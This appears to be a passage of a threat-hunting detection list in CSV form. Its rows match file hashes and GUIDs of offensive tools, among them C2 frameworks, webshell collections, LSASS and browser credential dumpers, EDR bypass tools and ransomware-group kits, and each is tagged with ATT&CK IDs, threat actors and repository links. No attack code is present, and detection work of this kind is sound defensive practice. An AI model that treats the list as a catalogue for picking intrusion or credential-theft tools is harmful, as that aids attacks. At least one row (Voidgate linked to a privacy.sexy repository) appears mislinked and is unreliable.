"*395d96a331abff7678ff53367fc4cc533be001125533a989688c17476d0f0125*",".{0,1000}395d96a331abff7678ff53367fc4cc533be001125533a989688c17476d0f0125.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24824"
"*39666b5eecc134e2d6c22ef6233faee7f8556383c82368b98d85ff106931f751*",".{0,1000}39666b5eecc134e2d6c22ef6233faee7f8556383c82368b98d85ff106931f751.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24827"
"*396febb7796a5a3ba0250af4700e9fa21240a83c4ebc2a744da0c2f028ca396c*",".{0,1000}396febb7796a5a3ba0250af4700e9fa21240a83c4ebc2a744da0c2f028ca396c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","24828"
"*3972dc9744f6499f0f9b2dbf76696f2ae7ad8af9b23dde66d6af86c9dfb36986*",".{0,1000}3972dc9744f6499f0f9b2dbf76696f2ae7ad8af9b23dde66d6af86c9dfb36986.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","24829"
"*3977d160d5b65edf6e6cf957b4903df9d69cd060ae9c7e1142edd307958c18b7*",".{0,1000}3977d160d5b65edf6e6cf957b4903df9d69cd060ae9c7e1142edd307958c18b7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24830"
"*3979fa127a6e7b52d76b4b92fa2fd3be3d51acfcf109da79ac51ab812cc16098*",".{0,1000}3979fa127a6e7b52d76b4b92fa2fd3be3d51acfcf109da79ac51ab812cc16098.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","24831"
"*39832c87758a620ccc75fcbdacee79993652fd81597ce79f52bab3f4b9abd2a5*",".{0,1000}39832c87758a620ccc75fcbdacee79993652fd81597ce79f52bab3f4b9abd2a5.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","24833"
"*3989cbea4af22774f0fa20d10b88c7247e675be8b9ec9dae716a44cb36d50189*",".{0,1000}3989cbea4af22774f0fa20d10b88c7247e675be8b9ec9dae716a44cb36d50189.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","0","#filehash","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","24835"
"*399399f17d32ec67656ef826a7efc16e48fb10f5b59da6b2d57feca3676a8190*",".{0,1000}399399f17d32ec67656ef826a7efc16e48fb10f5b59da6b2d57feca3676a8190.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#filehash","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","24837"
"*3998762030e8de14ef07cd7befce737e4ab9d4fa0682621dedb56e7774a941d5*",".{0,1000}3998762030e8de14ef07cd7befce737e4ab9d4fa0682621dedb56e7774a941d5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24838"
"*39a20042649a8a218ef4cb738fa9f4ab1d6396b35b741779a7e41204b828974b*",".{0,1000}39a20042649a8a218ef4cb738fa9f4ab1d6396b35b741779a7e41204b828974b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24839"
"*39a32bbb1285b51059b5e7780f3e0b49dff4496e904641219215ea13634aa8fd*",".{0,1000}39a32bbb1285b51059b5e7780f3e0b49dff4496e904641219215ea13634aa8fd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24840"
"*39a9dada9b6dc223cba7c4cb35efceb7cd9e40345c362c15e4c203d16f65de9f*",".{0,1000}39a9dada9b6dc223cba7c4cb35efceb7cd9e40345c362c15e4c203d16f65de9f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24841"
"*39a9f25d64ef416e4be4fadf6fae1b2169bfeb02501be443e8af1fec17412f60*",".{0,1000}39a9f25d64ef416e4be4fadf6fae1b2169bfeb02501be443e8af1fec17412f60.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","24842"
"*39b0071c3a25122df7a0e7cc29cd450b2a8a3caded094f3ab678eba80014c33c*",".{0,1000}39b0071c3a25122df7a0e7cc29cd450b2a8a3caded094f3ab678eba80014c33c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24844"
"*39b545c7cd26258a9e45923053a5a64c9461470c3d7bfce3be1c776b287e8a95*",".{0,1000}39b545c7cd26258a9e45923053a5a64c9461470c3d7bfce3be1c776b287e8a95.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","24845"
"*39b7a8fec13a9cee773a09c4f277a490b07fd2dd3009a7ee9092165688d7da32*",".{0,1000}39b7a8fec13a9cee773a09c4f277a490b07fd2dd3009a7ee9092165688d7da32.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24847"
"*39d3fecfab8b7ea9d5a3f3dbe26b78a8d3bd6d1f191992faeaf70ca4954fdd0d*",".{0,1000}39d3fecfab8b7ea9d5a3f3dbe26b78a8d3bd6d1f191992faeaf70ca4954fdd0d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24848"
"*39e848ddc5b27f5ff9be14dc925a8d2e3da39623fa02367a09a3f36732d55300*",".{0,1000}39e848ddc5b27f5ff9be14dc925a8d2e3da39623fa02367a09a3f36732d55300.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","24850"
"*39f0a8aa528f48997f9d2b81845eb9f7fbdf6151f34f883ee30da4649cc151ae*",".{0,1000}39f0a8aa528f48997f9d2b81845eb9f7fbdf6151f34f883ee30da4649cc151ae.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","24851"
"*39f4e1678adb3bbbf60f3c3a394f30a0c85d17e1db7c2f10b9815c2ebc5ed314*",".{0,1000}39f4e1678adb3bbbf60f3c3a394f30a0c85d17e1db7c2f10b9815c2ebc5ed314.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24853"
"*39f6d556d0567606d5763e60fecafeb3e5d16afd986c05602c06d2486d8d72c2*",".{0,1000}39f6d556d0567606d5763e60fecafeb3e5d16afd986c05602c06d2486d8d72c2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24854"
"*39f719f490cdea6b7566c0ad99a6c70b6d241f80328a82a403f33468a91744f2*",".{0,1000}39f719f490cdea6b7566c0ad99a6c70b6d241f80328a82a403f33468a91744f2.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","24855"
"*39fa3b4151fd83044106b63e95a820f4f1d769714d4f73369dba7a2187e0918b*",".{0,1000}39fa3b4151fd83044106b63e95a820f4f1d769714d4f73369dba7a2187e0918b.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","#filehash","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","24856"
"*39feb7b45b04c809b59430596ccf37468132d8f19e70b38dec1cc596268079d3*",".{0,1000}39feb7b45b04c809b59430596ccf37468132d8f19e70b38dec1cc596268079d3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24857"
"*3a04d62f46cebdb6a568e6a9099106314ca6398f9dedd2e5433e3a890505f62e*",".{0,1000}3a04d62f46cebdb6a568e6a9099106314ca6398f9dedd2e5433e3a890505f62e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24859"
"*3a0b118ddd6b02426aba9ead93a576f7b99997cf6f07907147dd0d3294ff8887*",".{0,1000}3a0b118ddd6b02426aba9ead93a576f7b99997cf6f07907147dd0d3294ff8887.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","24861"
"*3a0c5bd8c15075019d478b01768e3f81adb41a1bda738c8992d5b30903d64018*",".{0,1000}3a0c5bd8c15075019d478b01768e3f81adb41a1bda738c8992d5b30903d64018.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24862"
"*3a0c9bc22141bf413c8f2719e4266423e3d34b889f357408b4bbec60232bda66*",".{0,1000}3a0c9bc22141bf413c8f2719e4266423e3d34b889f357408b4bbec60232bda66.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24863"
"*3a1081100f285cef3c41c192d3b6d02f3bfcbc2b591be894f12ede8707b436b4*",".{0,1000}3a1081100f285cef3c41c192d3b6d02f3bfcbc2b591be894f12ede8707b436b4.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","24864"
"*3A128F79ABB162476A7677270884213C983E3F07A4850C930C8F9E7BEB38EB50*",".{0,1000}3A128F79ABB162476A7677270884213C983E3F07A4850C930C8F9E7BEB38EB50.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","24865"
"*3a14a252eb81351a4b9b204b416e17ced7f2af340e2b635c149cf53bf1be2732*",".{0,1000}3a14a252eb81351a4b9b204b416e17ced7f2af340e2b635c149cf53bf1be2732.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24868"
"*3a1737f6fde0316cbc7552b8452384174908d9d124dd65016554a087455dd94e*",".{0,1000}3a1737f6fde0316cbc7552b8452384174908d9d124dd65016554a087455dd94e.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","24869"
"*3a1f300d7497b58a8d8719e6fe6c9f7f3888e501ac601ff68712d96c0c3fa99d*",".{0,1000}3a1f300d7497b58a8d8719e6fe6c9f7f3888e501ac601ff68712d96c0c3fa99d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24870"
"*3a2b0667b9d4537180ef1bb22133b58ddb0f6dbd9941e603277d293884c9c2c9*",".{0,1000}3a2b0667b9d4537180ef1bb22133b58ddb0f6dbd9941e603277d293884c9c2c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24872"
"*3a2d28a6ff81e99af6bbeb0d0087866389c0177104b8e657e302c20ae4f6381c*",".{0,1000}3a2d28a6ff81e99af6bbeb0d0087866389c0177104b8e657e302c20ae4f6381c.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","24873"
"*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*",".{0,1000}3A2FCB56\-01A3\-41B3\-BDAA\-B25F45784B23.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","#GUIDproject","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","24875"
"*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*",".{0,1000}3A2FCB56\-01A3\-41B3\-BDAA\-B25F45784B23.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","#GUIDproject","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","24876"
"*3a368e8aad03b489b71857d21767b040a9cf0b433d1749013a9e07b133e8d136*",".{0,1000}3a368e8aad03b489b71857d21767b040a9cf0b433d1749013a9e07b133e8d136.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24877"
"*3a3b32c797443aeda45930d5b13f01d3a263ba4df42b2ed91da4a0e06e9590f7*",".{0,1000}3a3b32c797443aeda45930d5b13f01d3a263ba4df42b2ed91da4a0e06e9590f7.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","24880"
"*3a3bd44b20afbb14ce14e70e474491383c2fcc87a554e4fbdc489c65ee7ace2a*",".{0,1000}3a3bd44b20afbb14ce14e70e474491383c2fcc87a554e4fbdc489c65ee7ace2a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","24881"
"*3a3d9e54afc72d136525dc4e70bb97d5ec2f7c1d3fe2e3afe1d9a430f68b78af*",".{0,1000}3a3d9e54afc72d136525dc4e70bb97d5ec2f7c1d3fe2e3afe1d9a430f68b78af.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","24882"
"*3a3dabe266b3a40a834c57793083a5915c526b1bb2cf7939737aab035bc7ffeb*",".{0,1000}3a3dabe266b3a40a834c57793083a5915c526b1bb2cf7939737aab035bc7ffeb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24883"
"*3a45bdd0bae1a480040acc8ac74814d9abb904240b4c43e2fc8e730c69114fc9*",".{0,1000}3a45bdd0bae1a480040acc8ac74814d9abb904240b4c43e2fc8e730c69114fc9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24884"
"*3a503f261baea1d0cdd69d3dd8b397d7a403b8b987da910b633a1d89743842d0*",".{0,1000}3a503f261baea1d0cdd69d3dd8b397d7a403b8b987da910b633a1d89743842d0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24888"
